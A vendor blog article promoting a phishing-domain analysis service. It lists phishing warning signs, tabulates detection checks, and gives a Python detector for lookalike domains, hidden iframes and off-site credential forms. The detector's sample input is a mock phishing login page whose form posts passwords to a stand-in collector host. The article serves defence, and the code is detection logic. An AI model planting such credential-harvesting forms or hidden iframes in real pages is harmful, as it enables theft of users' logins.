Attackers have long used malicious methods to set up phishing sites disguised as well-known sites and to steal personal and financial information via email, SMS and online community boards. According to Verizon's 2021 Data Breach Investigations Report, 36% of breaches involved phishing, an indicator of how large a share of security breaches phishing tactics account for.
Below are some classic signs of attempted phishing that anyone could encounter.
- Use of domains or sender addresses that closely resemble those of reputable, well-known companies
- Absence of the normal certificate or security indicator in the web browser address bar
- Incorrect grammar, poorly formed sentences, spelling errors and inconsistent content
- Strong pressure to download files or click links, using wording that conveys a false sense of urgency and importance
AI Spera's Criminal IP (CIP) Domain Search feature allows you to reduce potential damage by determining whether a phishing site exists and diagnosing whether its domain is benign or malicious.
If you are a security manager, you may already be familiar with company employees reporting receipt of suspicious messages like the one illustrated below.
Once such a report has been filed, you must quickly block the domain in question and follow through with measures built on in-depth analysis in order to preempt further damage.
After analyzing the domain through Domain Search, its score was confirmed to be at a critical level. The analysis summary already noted that the Suspicious Length check was triggered, as the domain name is more than 30 characters long, and that the page contains an iframe tag, which is commonly used to insert malicious code.
Also, since the title, favicon, screenshot, inserted elements and "Redirect to" paths all differ from those of the real Facebook, it is quite evident that the domain is a phishing site.
AI Spera provides an explanatory feature summary, shown in the table below, so that security managers using Domain Search can more easily understand the analysis results for phishing sites.
| Category | Feature | Description |
|---|---|---|
| Common | URL with IP | Check whether the detected domain or link uses an IP address |
| Common | Fake Domain | Check domain similarity with top sites |
| Common | Fake SSL | Check certificate validity |
| Common | MITM Attack | Check the possibility of MITM attacks |
| Common | Locations | Check the country diversity of IPs associated with the domain |
| Common | Newborn Domain | Check domain creation time |
| Common | Suspicious Length | Check whether the domain name length is abnormal |
| Common | Abuse Record | Check whether any IP scored as Critical or Dangerous is included |
| Common | Mail Server | Check whether a mail server exists |
| Common | SPF1 Result | Check the SPF query results of the domain |
| Common | DGA Score | Check for irregular character strings |
| HTML | Hidden Element | Check for hidden elements in the HTML |
| HTML | Hidden Iframe | Check for hidden iframes in the HTML |
| HTML | Iframe | Check whether an iframe exists |
| HTML | Suspicious HTML Element | Check for suspicious objects in the HTML |
| HTML | Suspicious Program | Check for installation files downloadable from the HTML |
| HTML | Button Trap | Check for calls to entirely different domains from button events |
| HTML | Credential Input Form | Check where authentication information entered in the HTML is sent |
| Network | Redirection to another AS | Check for redirection to another AS |
| Network | Redirection to another country | Check for redirection to another country |
| Network | Redirection to another domain | Check for redirection to another domain |
| Network | Suspicious Cookie | Check validity of domain cookies |
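To make the table concrete, here is an added example (not code from AI Spera or the Criminal IP service) that implements a handful of the heuristics above on the defender's side: URL with IP, Suspicious Length (using the 30-character threshold mentioned earlier), Fake Domain (edit distance to, or an embedded brand token from, a small reference list that stands in for the "Top sites" list), Iframe and Hidden Iframe, and Credential Input Form (a password field whose form posts to a different registered domain). The reference list, sample URL and sample HTML are all constructed for this example; the registered-domain helper is a deliberate simplification that ignores multi-part TLDs such as co.uk.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for a "Top sites" reference list.
TOP_SITES = ["facebook.com", "google.com", "paypal.com", "microsoft.com", "apple.com"]
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
MAX_HOST_LEN = 30  # threshold from the article's Suspicious Length finding


def levenshtein(a, b):
    """Plain edit distance, used to spot typosquatted domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_domain(host):
    """Simplification: last two labels only (does not handle e.g. co.uk)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def is_lookalike(host):
    """Fake Domain check: close to a top site, or brand name embedded in the host."""
    rd = registered_domain(host)
    if rd in TOP_SITES:
        return False  # genuine site or one of its subdomains
    tokens = re.split(r"[.-]", host.lower())
    for site in TOP_SITES:
        brand = site.split(".")[0]
        if levenshtein(rd, site) <= 2 or brand in tokens:
            return True
    return False


class _HtmlInspector(HTMLParser):
    """Collects iframes, hidden iframes, form actions and password inputs."""

    def __init__(self):
        super().__init__()
        self.iframes = 0
        self.hidden_iframes = 0
        self.form_actions = []
        self.has_password_input = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes += 1
            style = (a.get("style") or "").replace(" ", "").lower()
            if ("display:none" in style or "visibility:hidden" in style
                    or a.get("width") == "0" or a.get("height") == "0"):
                self.hidden_iframes += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_input = True


def analyze(url, html=""):
    """Return a dict of boolean findings plus a simple count-based score."""
    host = urlparse(url).hostname or ""
    page_rd = registered_domain(host)
    findings = {
        "url_with_ip": bool(IPV4_RE.match(host)),
        "suspicious_length": len(host) > MAX_HOST_LEN,
        "fake_domain": is_lookalike(host),
    }
    inspector = _HtmlInspector()
    inspector.feed(html)
    findings["iframe"] = inspector.iframes > 0
    findings["hidden_iframe"] = inspector.hidden_iframes > 0
    # Credential Input Form: password field whose form posts to another registered domain.
    leak = False
    if inspector.has_password_input:
        for action in inspector.form_actions:
            target = urlparse(action).hostname
            if target and registered_domain(target) != page_rd:
                leak = True
    findings["credential_input_form"] = leak
    findings["score"] = sum(1 for v in findings.values() if v)
    return findings


# Constructed sample: a lookalike login page with a hidden iframe and an off-site form.
SAMPLE_URL = "http://facebook-com-login-verify-account-secure.example/login"
SAMPLE_HTML = """<html><head><title>Log in to Facebook</title></head><body>
<form action="http://collector.example/submit" method="post">
<input name="email"><input type="password" name="pass"><button>Log In</button></form>
<iframe src="http://tracker.example/x" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_URL, SAMPLE_HTML).items():
        print(f"{key:24} {value}")
```

The score here is just a count of triggered checks, which is enough to show how several weak signals combine into a strong verdict; a production scorer would weight the checks and add the network-side ones (AS, country and domain redirection) that this offline example cannot observe.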
Furthermore, since many phishing sites do not carry a normal, valid certificate, fraudulent websites are often flagged by alert messages in the web browser address bar and by the browser's built-in filtering features.
Unless it is a test website set up by your own company purely for testing purposes, it is advisable to treat a site as a phishing site if you come across warnings such as the ones shown below.
In order to avert potential damage caused by phishing sites, keep the following guidelines in mind and act accordingly.
- Delete messages and links from unknown origins immediately.
- Do not click when you cannot verify the electronic signature, or when lookalike domains or sender information are used.
- Enable all anti-phishing features provided by mobile devices, email clients and web browsers.
- Activate multi-factor authentication on as many accounts as possible.
- Use CIP Domain Search to obtain data-driven analysis results and respond quickly.
This article was written drawing on data provided by Criminal IP. If you are keen to find out more about specific Criminal IP services or about beta tester recruitment, feel free to head over to our LANDING PAGE, which is NOW open!